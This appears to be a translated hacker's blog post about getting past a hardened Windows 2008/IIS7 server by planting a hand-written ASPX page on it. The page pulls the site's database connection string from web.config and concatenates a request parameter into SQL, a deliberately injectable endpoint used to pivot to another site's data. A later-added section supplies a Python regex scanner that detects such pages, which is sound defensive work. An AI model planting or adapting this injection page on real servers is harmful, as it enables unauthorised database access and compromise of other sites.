Yesterday 4z1 and I were looking at a site. Privilege escalation was really hard; we spent a full 5 hours on it with no result. 2008 + IIS7, no sa, no root, none of the usual services...
What we actually ended up using was ASPX constructed injection to cross over to another site. I found a pile of code online and not one of them worked.
It isn't much code, so I just wrote one myself. So annoying.

<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
    void Page_Init(object sender, EventArgs e)
    {
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
        // "连接名" is a placeholder: the name of the connectionStrings entry in the site's web.config
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
        conn.Open();

        string i = this.Page.Request.Params["xxser"]; // the parameter goes here: ?xxser=1

        // "[表]" and "列名" are placeholders for a table and column name; i is concatenated into the SQL as-is
        System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
        int x = command.ExecuteNonQuery(); // rows affected (-1 for a plain SELECT)
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
</div>
</form>
</body>
</html>
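Added here from the defender's side, not part of the original post or the code it quotes: a small Python scanner that flags an uploaded .aspx whose server-side block shows the pattern of the page above (connection string pulled from web.config, a raw request parameter concatenated into a SqlCommand, then executed) while leaving a parameterised page alone. Both sample pages are constructed for this example.

```python
import re
# Constructed sample (not a real file from any server): the server-side block of
# the page posted above, boiled down to its essentials.
INJECTION_PAGE = r'''
<script language="c#" runat="server">
void page_init(object sender, EventArgs e)
{
    SqlConnection conn = new SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["site"].ToString();
    string i = this.Page.Request.Params["xxser"];
    SqlCommand command = new SqlCommand("select * from [t] where c= " + i, conn);
    int x = command.ExecuteNonQuery();
    Response.Write(x);
}
</script>
'''

# Constructed sample of a legitimate page that parameterises the same lookup.
SAFE_PAGE = r'''
<script language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
    using (var conn = new SqlConnection(ConfigurationManager.ConnectionStrings["site"].ConnectionString))
    using (var cmd = new SqlCommand("select name from t where c = @c", conn))
    {
        cmd.Parameters.Add("@c", SqlDbType.Int).Value = int.Parse(Request.QueryString["c"]);
        conn.Open();
        Response.Write(cmd.ExecuteScalar());
    }
}
</script>
'''

# Heuristic indicators; each is a cheap regex, so an intermediate variable
# ("string q = ... + i; new SqlCommand(q, conn)") would evade the concat check.
INDICATORS = {
    "reads_web_config_connstr": re.compile(r'ConfigurationManager\.ConnectionStrings\['),
    "raw_request_input": re.compile(r'Request\.(?:Params|QueryString|Form)\['),
    "concat_into_sqlcommand": re.compile(r'new\s+(?:[\w.]+\.)?SqlCommand\(\s*"[^"]*"\s*\+'),
    "executes_sql": re.compile(r'\.Execute(?:NonQuery|Reader|Scalar)\('),
    "parameterised": re.compile(r'Parameters\.Add\w*\(\s*"@'),
}

def score_aspx(source: str) -> dict:
    # Report which indicators fire and whether the page looks like an injection proxy.
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    hits["suspicious"] = (hits["raw_request_input"] and hits["concat_into_sqlcommand"]
                          and hits["executes_sql"] and not hits["parameterised"])
    return hits
```

Because the checks are regexes they are a triage aid: a page that builds its query in an intermediate variable or reads input through a helper slips past the concat check, so treat a hit as a reason to read the file, not as proof.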